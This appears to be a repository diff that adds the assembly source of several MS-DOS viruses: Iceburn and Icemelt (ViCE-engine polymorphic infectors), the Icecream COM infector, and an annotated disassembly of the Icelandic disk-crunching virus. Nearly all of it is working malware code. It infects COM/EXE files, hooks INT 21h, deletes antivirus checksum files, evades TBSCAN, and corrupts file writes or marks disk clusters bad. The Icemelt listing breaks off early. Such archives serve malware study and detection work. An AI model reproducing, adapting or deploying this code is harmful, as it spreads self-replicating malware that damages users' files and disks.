ID DW 4418H,5F19H ; The signature of the virus.
;
; A buffer, used for data from the file.
;
_TEXT ENDS
END LABEL1


404
MSDOS/Virus.MSDOS.Unknown.iceburn.asm Normal file
View File

@ -0,0 +1,404 @@
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-Ä
; Iceburn - (c)1995 ûirogen - Using ûiCE v0.2á
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-Ä
;
; þ Infects COM and EXE when executed.
; þ COM Infection marker: fourth byte is 0
; þ EXE infection marker: Checksum in header not equal to 0.
; þ Time/Date do not change
; þ Read-only and hidden files will be infected, and attributes restored.
; þ Virus installs its own critical error handler
; þ Deletes MSAV/CPAV CHecksum filez..
; þ Activates on the second of any month, at which time it will phuck
; up all file writes using INT 21h/func 40h.
; þ Does not use ViCE anti-tbscan. Has a second cryptor to thwart many
; TBSCAN flags.
;
cseg segment
assume cs:cseg, ds:cseg, es:cseg, ss:cseg
signal equ 0FA01h ; AX=signal/INT 21h/installation chk
vsafe_word equ 5945h ; magic word for VSAFE/VWATCH API
special equ 11h
act_day equ 2
buf_size equ 170
vice_size equ 1587+buf_size
virus_size equ (offset vend-offset start)+VICE_SIZE
extrn _vice:near
org 0h
start:
push ds es
inc si
mov ax,1000h ; looks like legit. INT call..
add ax,signal-1000h ; are we memory resident?
mov dx,vsafe_word
mov bl,special
int 21h
call nx ; get relative offset
nx: pop bp
sub bp,offset nx
or si,si
jz no_install ; if carry then we are
call crypt ; decrypt the next few bytez
c_start:
mov cs:activate[bp],0
mov ah,2ah ; get date
int 21h
cmp dl,act_day ;
jnz no_act
mov cs:activate[bp],1
no_act:
mov ax,ds ; PSP segment
dec ax ; mcb below PSP m0n
mov ds,ax ; DS=MCB seg
cmp byte ptr ds: [0],'Z' ; Is this the last MCB in chain?
jnz no_install
sub word ptr ds: [3],((virus_size+1023)/1024)*64*2 ; alloc MCB
sub word ptr ds: [12h],((virus_size+1023)/1024)*64*2 ; alloc PSP
mov es,word ptr ds: [12h] ; get high mem seg
push cs
pop ds
mov si,bp
mov cx,virus_size/2+1
xor di,di
rep movsw ; copy code to new seg
xor ax,ax
mov ds,ax ; null ds
push ds
lds ax,ds: [21h*4] ; get 21h vector
mov es: word ptr old21+2,ds ; save S:O
mov es: word ptr old21,ax
pop ds
mov ds: [21h*4+2],es ; new int 21h seg
mov ds: [21h*4],offset new21 ; new offset
sub byte ptr ds: [413h],((virus_size+1023)*2)/1024;-totalmem
c_end:
no_install:
pop es ds ; restore ES DS
cmp cs:is_exe[bp],1
jz exe_return
lea si,org_bytes[bp] ; com return
mov di,0100h ; -restore first 4 bytes
mov cx,2
rep movsw
mov ax,100h ; jump back to 100h
push ax
_ret:ret
exe_return:
mov cx,ds ; calc. real CS
add cx,10h
add word ptr cs:[exe_jump+2+bp],cx
int 3 ; fix prefetch
db 0eah
exe_jump dd 0
is_exe db 0
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Crypts portion of virus
;
crypt_res:
xor bp,bp
crypt:
lea si,c_start
add si,bp
mov cx,(offset c_end-offset c_start)
add byte ptr cs:xor_op[bp],10h ; self modifying code...
int 3 ; fix prefetch
l1:
db 2Eh
xor_op db 70h,34h ; tbscan won't flag this bitch
xor_val db 0
inc si
loop l1
sub byte ptr cs:xor_op[bp],10h ; unmodify code
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Infection routine - called from INT 21h handler.
; DS:DX=fname
;
infect_file:
push dx
pop si
push ds
xor ax,ax ; null ES
mov es,ax
lds ax,es:[24h*4] ; get INT 24h vector
mov cs:old_24_off,ax ; save it
mov cs:old_24_seg,ds
mov es:[24h*4+2],cs ; install our handler
mov es:[24h*4],offset new_24
pop ds
push es ; we'll need it later
push cs
pop es
mov ax,4300h ; get phile attribute
int 21h
mov ax,4301h ; null attribs
push ax cx ; save AX-call/CX-attrib
xor cx,cx
int 21h
mov ax,3d02h ; open the file
int 21h
jc dont_do
mov bx,ax ; get handle
push cs
pop ds
call kill_chklst ; kill MSAV and CPAV checksum files
mov ah,3fh ; Read first bytes of file
mov cx,20h
lea dx,org_bytes
int 21h
cmp byte ptr org_bytes,'M' ; single byte avoids heuristic flag
jz do_exe
cmp byte ptr org_bytes+3,0
jz close
mov is_exe,0
mov ax,5700h ; get time/date
int 21h
push cx dx
call offset_end
push ax ; AX=end of file
lea si,start ; DS:SI=start of code to encrypt
mov di,virus_size ; ES:DI=address for decryptor/
push di ; encrypted code. (at heap)
mov cx,virus_size ; CX=virus size
mov dx,ax ; DX=EOF offset
add dx,100h ; DX=offset decryptor will run from
mov al,00001011b ; jmps,no anti-tbscan, garbage, no CS:
call _vice ; call engine!
pop dx
mov ah,40h
int 21h
call offset_zero
pop ax ; restore COM file size
sub ax,3 ; calculate jmp offset
mov word ptr new_jmp+1,ax
lea dx,new_jmp
mov cx,4
mov ah,40h
int 21h
pop dx cx ; pop date/time
mov ax,5701h ; restore the mother fuckers
int 21h
close:
pop cx ax ; restore attrib
int 21h
mov ah,3eh
int 21h
dont_do:
pop es ; ES=0
lds ax,dword ptr old_24_off ; restore shitty DOS error handler
mov es:[24h*4],ax
mov es:[24h*4+2],ds
ret
do_exe:
cmp word ptr exe_header[12h],0 ; is checksum (in hdr) 0?
jnz close
cmp byte ptr exe_header[18h],52h ; pklite'd?
jz exe_ok
cmp byte ptr exe_header[18h],40h ; don't infect new format exe
jge close
exe_ok:
push bx
mov ah,2ch ; grab a random number
int 21h
mov word ptr exe_header[12h],dx ; mark that it's us
mov is_exe,1
les ax,dword ptr exe_header+14h ; Save old entry point
mov word ptr ds:exe_jump, ax
mov word ptr ds:exe_jump+2, es
push cs
pop es
call offset_end
push dx ax ; save file size DX:AX
mov bx, word ptr exe_header+8h ; calc. new entry point
mov cl,4 ; *16
shl bx,cl ; ^by shifting one byte
sub ax,bx ; get actual file size-header
sbb dx,0
mov cx,10h ; divide AX/CX rDX
div cx
mov word ptr exe_header+14h,dx
mov word ptr exe_header+16h,ax
mov rel_off,dx
pop ax ; AX:DX file size
pop dx
pop bx
mov cx,virus_size+10h ; calc. new size
adc ax,cx
mov cl,9 ; calc new alloc (512)
push ax
shr ax,cl
ror dx,cl
stc
adc dx,ax
pop ax ; ax=size+virus
and ah,1
mov word ptr exe_header+4h,dx
mov word ptr exe_header+2h,ax
lea si,start ; DS:SI=start of code to encrypt
mov di,virus_size ; ES:DI=address for decryptor and
push di ; encrypted code (at heap)
mov cx,virus_size ; CX=virus size
mov dx,rel_off ; DX=offset decryptor will run from
mov al,00001010b ; jmps,no anti-tbscan,garbage, use CS:
call _vice ; call engine!
pop dx
mov ah,40h
int 21h
call offset_zero
mov cx,18h ; write fiXed header
lea dx,exe_header
mov ah,40h
int 21h
jmp close
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; set file ptr
offset_zero: ; self explanitory
xor al,al
jmp set_fp
offset_end:
mov al,02h
set_fp:
mov ah,42h
xor cx,cx
xor dx,dx
int 21h
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Kill those darned MSAV and CPAV filez..
;
kill_chklst:
mov di,2 ; counter for loop
lea dx,first_2die ; first fname to kill
kill_loop:
mov ax,4301h ; reset attribs
xor cx,cx
int 21h
mov ah,41h ; delete phile
int 21h
lea dx,last_2die ; second fname to kill
dec di
jnz kill_loop
ret
first_2die db 'CHKLIST.MS',0 ; MSAV shitty checksum
last_2die db 'CHKLIST.CPS',0 ; CPAV shitty checksum
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; new 21h
new21:
pushf
cmp ax,signal ; be it us?
jnz not_us ; richtig..
cmp dx,vsafe_word
jnz not_us
cmp bl,special
jnz not_us
xor si,si
mov di,4559h
jmp jmp_org
not_us:
cmp cs:activate,0 ; time to activate?
jz nchk
cmp ah,40h ; write to phile?
jnz jmp_org
xor dx,dx ; phuck up address..
nchk: cmp ax,4b00h ; execute phile?
jnz jmp_org
push ax bx cx di dx si ds es bp dx
mov ah,2ch ; grab random for cryptor
int 21h
mov byte ptr cs:xor_val,dl
pop dx
call crypt_res
call infect_file
call crypt_res
pop bp es ds si dx di cx bx ax
jmp_org:
popf
db 0eah ; jump far XXXX:XXXX
old21 dd 0
new_24: ; critical error handler
mov al,3 ; prompts suck, return fail
iret
activate db 0
txt_ptr dw offset credits
credits db '[IceBurn, by ûirogen]'
credit_end:
new_jmp db 0E9h,0,0,0 ; jmp XXXX,0
rel_off dw 0
exe_header:
org_bytes db 0CDh,20h,0,0 ; original COM bytes | exe hdr
heap:
db 16h dup(0) ; remaining exe header space
old_24_off dw 0 ; old int24h vector
old_24_seg dw 0
vend:
cseg ends
end start

259
MSDOS/Virus.MSDOS.Unknown.icecream.asm Normal file
View File

@ -0,0 +1,259 @@
;Icecream Virus by the TridenT virus research group.
;This is a simple direct-action com virus that uses one of
;4 encryption algorithms to encrypt itself each time it infects a file.
;It will infect one .COM file in the current directory every time it is
;executed. It marks infections with the time stamp.
;Disassembly by Black Wolf
.model tiny
.code
org 100h
start:
db 0e9h,0ch,0 ;jmp Virus_Entry
Author_Name db 'John Tardy'
db 0E2h,0FAh
Virus_Entry:
push ax
call Get_Offset
Get_Offset:
pop ax
sub ax,offset Get_Offset
db 89h,0c5h ;mov bp,ax
lea si,[bp+Storage]
mov di,100h ;Restore file
movsw
movsb
mov ah,1Ah
mov dx,0f900h
int 21h ;Set DTA
mov ah,4Eh
FindFirstNext:
lea dx,[bp+ComMask]
xor cx,cx
int 21h ;Find File
jnc InfectFile
Restore_DTA:
mov ah,1Ah
mov dx,80h
int 21h ;Set DTA to default
mov bx,offset start
pop ax ;Return to host
push bx
retn
InfectFile:
mov ax,4300h
mov dx,0f91eh
int 21h ;Get file attribs
push cx ;save 'em
mov ax,4301h
xor cx,cx
int 21h ;Set them to 0
mov ax,3D02h
int 21h ;Open file
mov bx,5700h
xchg ax,bx
int 21h ;Get file time
push cx
push dx ;save it
and cx,1Fh
cmp cx,1 ;check for infection
jne ContinueInfection
db 0e9h,69h,0 ;jmp DoneInfect
ContinueInfection:
mov ah,3Fh
lea dx,[bp+Storage]
mov cx,3
int 21h ;Read in first 3 bytes
mov ax,cs:[Storage+bp]
cmp ax,4D5Ah ;Is it an EXE?
je DoneInfect
cmp ax,5A4Dh
je DoneInfect ;Other EXE signature?
pop dx
pop cx
and cx,0FFE0h ;Change stored time values
or cx,1 ;to mark infection
push cx
push dx
mov ax,4202h ;Go to the end of the file
call Move_FP
sub ax,3
mov cs:[JumpSize+bp],ax ;Save jump size
add ax,10Fh ;Save encryption starting
mov word ptr [bp+EncPtr1+1],ax ;point....
mov word ptr [bp+EncPtr2+1],ax
mov word ptr [bp+EncPtr3+1],ax
mov word ptr [bp+EncPtr4+1],ax
call SetupEncryption ;Encrypt virus
mov ah,40h
mov dx,0fa00h
mov cx,1F5h
int 21h ;Write virus to file
mov ax,4200h
call Move_FP ;Go to the beginning of file
mov ah,40h
lea dx,[bp+JumpBytes]
mov cx,3
int 21h ;Write in jump
call FinishFile
jmp Restore_DTA
DoneInfect:
call FinishFile
mov ah,4Fh
jmp FindFirstNext
Move_FP:
xor cx,cx
xor dx,dx
int 21h
ret
FinishFile:
pop si dx cx
mov ax,5701h ;Reset file time/date stamp
int 21h ;(or mark infection)
mov ah,3Eh
int 21h ;Close new host file
mov ax,4301h
pop cx
mov dx,0fc1eh
int 21h ;Restore old attributes
push si
retn
Message db ' I scream, you scream, we both '
db 'scream for an ice-cream! '
SetupEncryption:
xor byte ptr [bp+10Dh],2
xor ax,ax
mov es,ax
mov ax,es:[46ch] ;Get random number
push cs
pop es
push ax
and ax,7FFh
add ax,1E9h
mov word ptr [bp+EncSize1+1],ax
mov word ptr [bp+EncSize2+1],ax
mov word ptr [bp+EncSize3+1],ax
mov word ptr [bp+EncSize4+1],ax
pop ax
push ax
and ax,3
shl ax,1
mov si,ax
mov ax,[bp+si+EncData1]
add ax,bp
mov si,ax
lea di,[bp+103h]
movsw
movsw
movsw
movsw ;Copy Encryption Algorithm
pop ax
stosb
movsb
mov dl,al
lea si,[bp+103h]
mov di,0fa00h
mov cx,0Ch
rep movsb
lea si,[bp+10Fh]
mov cx,1E9h
EncryptVirus:
lodsb
db 30h,0d0h ;xor al,dl
stosb
loop EncryptVirus
cmp dl,0
je KeyWasZero
retn
KeyWasZero: ;If key is zero, increase
mov si,offset AuthorName ;jump size and place name
mov di,0fa00h ;at beginning....
mov cx,0Ah
rep movsb
mov ax,cs:[JumpSize+bp]
add ax,0Ch
mov cs:[JumpSize+bp],ax
retn
db '[TridenT]'
EncData1 dw 02beh
EncData2 dw 02c7h
EncData3 dw 02d0h
EncData4 dw 02d9h
Encryptions:
;------------------------------------------------------------
EncPtr1:
mov si,0
EncSize1:
mov cx,0
xor byte ptr [si],46h
;------------------------------------------------------------
EncPtr2:
mov di,0
EncSize2:
mov cx,0
xor byte ptr [di],47h
;------------------------------------------------------------
EncSize3:
mov cx,0
EncPtr3:
mov si,0
xor byte ptr [si],46h
;------------------------------------------------------------
EncSize4:
mov cx,0
EncPtr4:
mov di,0
xor byte ptr [di],47h
;------------------------------------------------------------
AuthorName db 'John Tardy'
JumpBytes db 0E9h
JumpSize dw 0
ComMask db '*.CoM',0
Storage dw 20CDh
db 21h
end start

554
MSDOS/Virus.MSDOS.Unknown.icelandi.asm Normal file
View File

@ -0,0 +1,554 @@
; THE ICELANDIC "DISK-CRUNCHING" VIRUS
;
; Another possible name for this virus might be "One-in-ten", since
; it tries to infect every tenth program run. The Icelandic name for
; this virus ("Diskaetuvirus") translates to "Disk-eating virus"
;
; It was first located at one site in mid-June '89. It has since then
; been found at a few other places, but is quite rare yet. So far it
; does not seem to have spread to any other country.
;
; Disassembly done in June/July '89.
;
; The author of this program is unknown, but it appears to be of
; Icelandic origin.
;
; All comments in this file were added by Fridrik Skulason,
; University of Iceland/Computing Services.
;
; INTERNET: frisk@rhi.hi.is
; UUCP: ...mcvax!hafro!rhi!frisk
; BIX: FRISK
;
; To anyone who obtains this file - please be careful with it, I
; would not like to see this virus be distributed too much. The code
; is very clear, and the virus is quite well written. It would be VERY
; easy to modify it to do something really harmful.
;
; A short description of the virus:
;
; It only infects .EXE files. Infected files grow by 656 to 671
; bytes, and the length of the infected file MOD 16 will always be 0.
; The virus attaches itself to the end of the programs it infects.
;
; When an infected file is run, the virus copies itself to top of
; free memory, and modifies the memory blocks, in order to hide from
; memory mapping programs. Some programs may overwrite this area,
; causing the computer to crash.
;
; The virus does nothing if some other program has hooked INT 13
; before it is run. This is probably done to avoid detection by
; protection programs, but it also means that many ordinary
; programs like SideKick and disk cache software will disable it.
; Even the PRINT command will disable the virus. This reduces the
; spread of the virus, but also greatly reduces the possibility that
; the virus will be detected.
;
; The virus will hook INT 21H and when function 4B (EXEC) is called
; it sometimes will infect the program being run. It will check every
; tenth program that is run for infection, and if it is not already
; infected, it will be.
;
; The virus will remove the Read-Only attribute before trying to
; infect programs.
;
; Infected files can be easily recognized, since they always end in
; 4418,5F19.
;
; To check for system infection, a byte at 0:37F is used - if it
; contains FF the virus is installed in memory.
;
; This virus is slightly harmful, but does no serious damage.
; On floppy-only, or machines with 10Mbyte hard disks it will do
; no damage at all, but on machines with larger hard disks it will
; select one unused entry in the FAT table, and mark it as bad, when it
; infects a file. Since the virus only modifies the first copy of the
; FAT, a quick fix is simply to copy the second table over the first.
; This is the only "mistake" I have found in this virus. It appears
; to be very well written - What a shame the programmer did not use
; his abilities for something more constructive.
;
; This file was created in the following way: I wrote a small program,
; that did nothing but write "Hello world!" and ran it several times,
; until it became infected. I then diassembled the program, changed
; it into an .ASM file, and worked on it until this file, when
; assembled, produced the same file as the original infected one.
;
; (Or almost the same - the checksum in the header is different).
;
VIRSIZ EQU 128
ASSUME CS:_TEXT,DS:_TEXT,SS:NOTHING,ES:NOTHING
;
; This is the original program.
;
_TEXT1 SEGMENT PARA PUBLIC 'CODE'
_START DB 0b4H,09H
PUSH CS
POP DS
MOV DX,OFFSET STRING
INT 21H
MOV AX,4C00H
INT 21H
STRING DB "Hello world!",0dh,0ah,"$"
_TEXT1 ENDS
_TEXT SEGMENT PARA PUBLIC 'CODE'
;
; The virus is basically divided in three parts.
;
; 1. The main program - run when an infected program is run.
; It will check if the system is already infected, and if not
; it will install the virus.
;
; 2. The new INT 21 handler. It will look for EXEC calls, and
; (sometimes) infect the program being run.
;
; 3. The damage routine. It will select one unused cluster and mark it
; as bad.
;
VIRUS PROC FAR
;
; This is a fake MCB
;
DB 'Z',00,00,VIRSIZ,0,0,0,0,0,0,0,0,0,0,0,0
;
; The virus starts by pushing the original start address on the stack,
; so it can transfer control there when finished.
;
LABIA: SUB SP,4
PUSH BP
MOV BP,SP
PUSH AX
MOV AX,ES
;
; Put the the original CS on the stack. The ADD AX,data instruction
; is modified by the virus when it infects other programs.
;
DB 05H
ORG_CS DW 0010H
MOV [BP+4],AX
;
; Put the the original IP on the stack. This MOV [BP+2],data instruction
; is modified by the virus when it infects other programs.
;
DB 0C7H,46H,02H
ORG_IP DW 0000H
;
; Save all registers that are modified.
;
PUSH ES
PUSH DS
PUSH BX
PUSH CX
PUSH SI
PUSH DI
;
; Check if already installed. Quit if so.
;
XOR AX,AX
MOV ES,AX
CMP ES:[37FH],BYTE PTR 0FFH
JNE L1
;
; Restore all registers and return to the original program.
;
EXIT: POP DI
POP SI
POP CX
POP BX
POP DS
POP ES
POP AX
POP BP
RET
;
; Check if INT 13 is 0070:xxxx or F000:xxxx. If not, assume some
; program is monitoring int 13, and quit.
;
L1: MOV AX,ES:[4EH]
CMP AX,0070H
JE L2
CMP AX,0F000H
JNE EXIT
;
; Set the installation flag, so infected programs run later will
; recognize the infection.
;
L2: MOV ES:[37FH],BYTE PTR 0FFH
;
; The virus tries to hide from detection by modifying the memory block it
; uses, so it seems to be a block that belongs to the operating system.
;
; It looks rather weird, but it seems to work.
;
MOV AH,52H
INT 21H
MOV AX,ES:[BX-2]
MOV ES,AX
ADD AX,ES:[0003]
INC AX
INC AX
MOV CS:[0001],AX
;
; Next, the virus modifies the memory block of the infected program.
; It is made smaller, and no longer the last block.
;
MOV BX,DS
DEC BX
MOV DS,BX
MOV AL,'M'
MOV DS:[0000],AL
MOV AX,DS:[0003]
SUB AX,VIRSIZ
MOV DS:[0003],AX
ADD BX,AX
INC BX
;
; Then the virus moves itself to the new block. For some reason 2000
; bytes are transferred, when 651 would be enough. Maybe the author just
; wanted to leave room for future expansions.
;
MOV ES,BX
XOR SI,SI
XOR DI,DI
PUSH CS
POP DS
MOV CX,2000
CLD
REP MOVSB
;
; The virus then transfers control to the new copy of itself.
;
PUSH ES
MOV AX,OFFSET L3
PUSH AX
RET
;
; The main program modifies INT 21 next and finally returns to the
; original program. The original INT 21 vector is stored inside the
; program so a JMP [OLD INT21] instruction can be used.
;
L3: XOR AX,AX
MOV ES,AX
MOV AX,ES:[0084H]
MOV CS:[OLD21],AX
MOV AX,ES:[0086H]
MOV CS:[OLD21+2],AX
MOV AX,CS
MOV ES:[0086H],AX
MOV AX,OFFSET NEW21
MOV ES:[0084H],AX
JMP EXIT
VIRUS ENDP
;
; This is the INT 21 replacement. It only does something in the case
; of an EXEC call.
;
NEW21 PROC FAR
CMP AH,4BH
JE L5
L4: DB 0EAH
OLD21 DW 0,0
;
; Only attack every tenth program run.
;
L5: DEC CS:[COUNTER]
JNE L4
MOV CS:[COUNTER],10
;
; Save all affected registers.
;
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DS
;
; Search for the file name extension ...
;
MOV BX,DX
L6: INC BX
CMP BYTE PTR [BX],'.'
JE L8
CMP BYTE PTR [BX],0
JNE L6
;
; ... and quit unless it starts with "EX".
;
L7: POP DS
POP SI
POP DX
POP CX
POP BX
POP AX
JMP L4
L8: INC BX
CMP WORD PTR [BX],5845H
JNE L7
;
; When an .EXE file is found, the virus starts by turning off
; the read-only attribute. The read-only attribute is not restored
; when the file has been infected.
;
MOV AX,4300H ; Get attribute
INT 21H
JC L7
MOV AX,4301H ; Set attribute
AND CX,0FEH
INT 21H
JC L7
;
; Next, the file is examined to see if it is already infected.
; The signature (4418 5F19) is stored in the last two words.
;
MOV AX,3D02H ; Open / write access
INT 21H
JC L7
MOV BX,AX ; file handle in BX
PUSH CS ; now DS is no longer needed
POP DS
;
; The header of the file is read in at [ID+8]. The virus then
; modifies itself, according to the information stored in the
; header. (The original CS and IP addressed are stored).
;
MOV DX,OFFSET ID+8
MOV CX,1CH
MOV AH,3FH
INT 21H
JC L9
MOV AX,DS:ID[1CH]
MOV DS:[ORG_IP],AX
MOV AX,DS:ID[1EH]
ADD AX,10H
MOV DS:[ORG_CS],AX
;
; Next the read/write pointer is moved to the end of the file-4,
; and the last 4 bytes read. They are compared to the signature,
; and if equal nothing happens.
;
MOV AX,4202H
MOV CX,-1
MOV DX,-4
INT 21H
JC L9
ADD AX,4
MOV DS:[LEN_LO],AX
JNC L8A
INC DX
L8A: MOV DS:[LEN_HI],DX
MOV AH,3FH
MOV CX,4
MOV DX,OFFSET ID+4
INT 21H
JNC L11
L9: MOV AH,3EH
INT 21H
L10: JMP L7
;
; Compare to 4418,5F19
;
L11: MOV SI,OFFSET ID+4
MOV AX,[SI]
CMP AX,4418H
JNE L12
MOV AX,[SI+2]
CMP AX,5F19H
JE L9
;
; The file is not infected, so the next thing the virus does is
; infecting it. First it is padded so the length becomes a multiple
; of 16 bytes. Tis is probably done so the virus code can start at a
; paragraph boundary.
;
L12: MOV AX,DS:[LEN_LO]
AND AX,0FH
JZ L13
MOV CX,16
SUB CX,AX
ADD DS:[LEN_LO],CX
JNC L12A
INC DS:[LEN_HI]
L12A: MOV AH,40H
INT 21H
JC L9
;
; Next the main body of the virus is written to the end.
;
L13: XOR DX,DX
MOV CX,OFFSET ID + 4
MOV AH,40H
INT 21H
JC L9
;
; Next the .EXE file header is modified:
;
; First modify initial IP
;
MOV AX,OFFSET LABIA
MOV DS:ID[1CH],AX
;
; Modify starting CS = Virus CS. It is computed as:
;
; (Original length of file+padding)/16 - Start of load module
;
MOV DX,DS:[LEN_HI]
MOV AX,DS:[LEN_LO]
SHR DX,1
RCR AX,1
SHR DX,1
RCR AX,1
SHR DX,1
RCR AX,1
SHR DX,1
RCR AX,1
SUB AX,DS:ID[10H]
MOV DS:ID[1EH],AX
;
; Modify length mod 512
;
ADD DS:[LEN_LO],OFFSET ID+4
JNC L14
INC DS:[LEN_HI]
L14: MOV AX,DS:[LEN_LO]
AND AX,511
MOV DS:ID[0AH],AX
;
; Modify number of blocks used
;
MOV DX,DS:[LEN_HI]
MOV AX,DS:[LEN_LO]
ADD AX,511
JNC L14A
INC DX
L14A: MOV AL,AH
MOV AH,DL
SHR AX,1
MOV DS:ID[0CH],AX
;
; Finally the modified header is written back to the start of the
; file.
;
QQQ: MOV AX,4200H
XOR CX,CX
XOR DX,DX
INT 21H
JC ENDIT
MOV AH,40H
MOV DX,OFFSET ID+8
MOV CX,1CH
INT 21H
JC ENDIT
MOV AH,3EH
INT 21H
JNC DAMAGE
;
; Infection is finished - close the file and execute it
;
ENDIT: JMP L9
NEW21 ENDP
;
; The damage routine. As before noted, it will only do damage on
; systems with a hard disk larger than 10Mbytes (With 16 bit FAT)
;
TEMP DW 0
;
; Start by getting some information about the current drive, like size
; of the FAT etc. Then compute the total number of sectors, and quit
; unless it is greater than 20740. This is probably done since larger
; disks use 16 bit FAT entries, instead of 12, which makes life easier
; for the programmer.
;
DAMAGE: MOV AH,32H
MOV DL,0
INT 21H
CMP AL,0FFH
JE L21
XOR AX,AX
MOV AL,[BX+4]
INC AX
MOV CS:[TEMP],AX
MOV AX,[BX+0DH]
DEC AX
MUL CS:[TEMP]
ADD AX,[BX+0BH]
JNC L15A
INC DX
L15A: CMP DX,0
JNE L15B
CMP AX,20740
JBE L21
;
; Check if DOS version is 4.0 or greater. If so, use a 16 bit value
; for numbers of sectors in the FAT, otherwise use a 8 bit entry.
L15B: PUSH BX
MOV AH,30H
INT 21H
POP BX
CMP AL,4
JAE L15
XOR AX,AX
MOV AL,[BX+0FH]
JMP SHORT L16
L15: MOV AX,[BX+0FH]
L16: ADD AX,[BX+6]
DEC AX
MOV DX,AX
MOV AL,[BX]
;
; Read the last sector in the first copy of the FAT. Search backwards
; for an unused entry. If none is found, read the sector before that
; and so on. If no free entry is found on the entire disk then quit.
;
L20: MOV CX,1
MOV BX,OFFSET ID+4
PUSH CS
POP DS
PUSH AX
PUSH DX
INT 25H
POPF
JC L21
POP DX
POP AX
MOV SI,510
L17: MOV BX,DS:[ID+4+SI]
CMP BX,0000
JE L19
CMP SI,0000
JE L18
DEC SI
DEC SI
JMP L17
L18: DEC DX
CMP DX,8
JE L21
JMP L20
;
; A free entry has been found. Make it look like a bad cluster, by
; changing the 0000 value to FFF7.
;
L19: MOV DS:[ID+4+SI],0FFF7H
MOV CX,1
MOV BX,OFFSET ID+4
INT 26H
POPF
L21: JMP L7
COUNTER DB 10
LEN_LO DW ?
LEN_HI DW ?
ID DW 4418H,5F19H ; The signature of the virus.
;
; A buffer, used for data from the file.
;
_TEXT ENDS
END LABIA


409
MSDOS/Virus.MSDOS.Unknown.icemelt.asm Normal file
View File

@ -0,0 +1,409 @@
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-Ä
; Icemelt - (c)1995 ûirogen - Using ûiCE v0.2á
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-Ä
;
; þ Infects COM and EXE when executed.
; þ COM Infection marker: fourth byte is 0
; þ EXE infection marker: Checksum in header not equal to 0.
; þ Time/Date do not change
; þ Read-only and hidden files will be infected, and attributes restored.
; þ Virus installs its own critical error handler
; þ Deletes MSAV and CPAV Checksum filez.
; þ Activates on the second of any month, at which time it will phuck
; up all file writes using INT 21h/func 40h.
; þ Does not use ViCE anti-tbscan. Has a second cryptor to thwart many
; TBSCAN flags. Does not use ViCE Garbage.
;
cseg segment
assume cs:cseg, ds:cseg, es:cseg, ss:cseg
signal equ 0FA01h ; AX=signal/INT 21h/installation chk
vsafe_word equ 5945h ; magic word for VSAFE/VWATCH API
special equ 11h
act_day equ 2
buf_size equ 170
vice_size equ 1602+buf_size
virus_size equ (offset vend-offset start)+VICE_SIZE
extrn _vice:near
org 0h
start:
push ds es
inc si
mov ax,1000h ; looks like legit. INT call..
add ax,signal-1000h ; are we memory resident?
mov dx,vsafe_word
mov bl,special
int 21h
call nx ; get relative offset
nx: pop bp
sub bp,offset nx
or si,si
jz no_install ; if carry then we are
call crypt ; decrypt the next few bytez
c_start:
mov cs:activate[bp],0
mov ah,2ah ; get date
int 21h
cmp dl,act_day ;
jnz no_act
mov cs:activate[bp],1
no_act:
mov ax,ds ; PSP segment
dec ax ; mcb below PSP m0n
mov ds,ax ; DS=MCB seg
cmp byte ptr ds: [0],'Z' ; Is this the last MCB in chain?
jnz no_install
sub word ptr ds: [3],((virus_size+1023)/1024)*64*2 ; alloc MCB
sub word ptr ds: [12h],((virus_size+1023)/1024)*64*2 ; alloc PSP
mov es,word ptr ds: [12h] ; get high mem seg
push cs
pop ds
mov si,bp
mov cx,virus_size/2+1
xor di,di
rep movsw ; copy code to new seg
xor ax,ax
mov ds,ax ; null ds
push ds
lds ax,ds: [21h*4] ; get 21h vector
mov es: word ptr old21+2,ds ; save S:O
mov es: word ptr old21,ax
pop ds
mov ds: [21h*4+2],es ; new int 21h seg
mov ds: [21h*4],offset new21 ; new offset
sub byte ptr ds: [413h],((virus_size+1023)*2)/1024;-totalmem
c_end:
no_install:
pop es ds ; restore ES DS
cmp cs:is_exe[bp],1
jz exe_return
lea si,org_bytes[bp] ; com return
mov di,0100h ; -restore first 4 bytes
mov cx,2
rep movsw
mov ax,100h ; jump back to 100h
push ax
_ret:ret
exe_return:
mov cx,ds ; calc. real CS
add cx,10h
add word ptr cs:[exe_jump+2+bp],cx
int 3 ; fix prefetch
db 0eah
exe_jump dd 0
is_exe db 0
